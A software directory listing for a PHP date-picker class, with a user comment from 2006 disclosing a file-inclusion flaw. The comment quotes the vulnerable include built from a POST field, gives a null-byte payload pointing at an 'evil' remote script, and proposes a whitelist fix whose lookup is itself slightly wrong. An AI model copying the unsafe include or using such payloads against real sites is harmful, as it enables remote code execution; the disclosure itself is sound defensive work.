|
About:
PHP Date Picker Class will automatically generate
the required HTML and JavaScript code that will
make a pop-up window appear to let the user choose
a date from a calendar. The selected date will be
passed to a user-specified control from the
calling page. Every aspect is customizable by
modifying a template and a related CSS file.
The format in which the date is returned, the
default date and time period, and the first day of
the week can be selected.
Author:
Stefan Gabos [contact developer]
Homepage:
http://stefangabos.blogspot.com/[..]ra-php-component-framework-php-date.html
Trove categories:
[change]
Dependencies:
[change]
No dependencies filed
|
|
» Rating:
(not rated)
» Vitality: 0.00% (Rank 7896)
» Popularity: 0.76% (Rank 7700)
 
(click to enlarge graphs)
Record hits: 14,466
URL hits: 3,940
Subscribers: 11
|
|
Branches
Comments
[»]
Code needs Security
by tobozo - Oct 12th 2006 03:41:29
Very nice work, however the code in datepicker.php seems to trust user
input a bit too much.
include_once("../languages/".$_POST["language"].".php");
On some platforms, what would happen if some crafted html form was
submitted with a value like this one :
%00http://www.evil.site.com/evil.script ?
quickfix :
Validate any single data coming from the wild. There are a few methods to
do this depending on what you need from this data.
$langs = array(
'default' => 'english.php',
'english' => 'english.php',
'french' => 'french.php
(...)
);
if(!in_array($_POST['language'], $langs)) {
$language = $langs['default'];
} else {
$language = $langs[$_POST['language']];
}
include_once("../languages/".$language);
methods for validating numbers :
$myNumber = sprintf('%02d', $_GET['myNumber']);
also works (dirty) :
$myNumber = (int)$_GET['myNumber'];
hope this helps
tobozo
[reply]
[top]
|
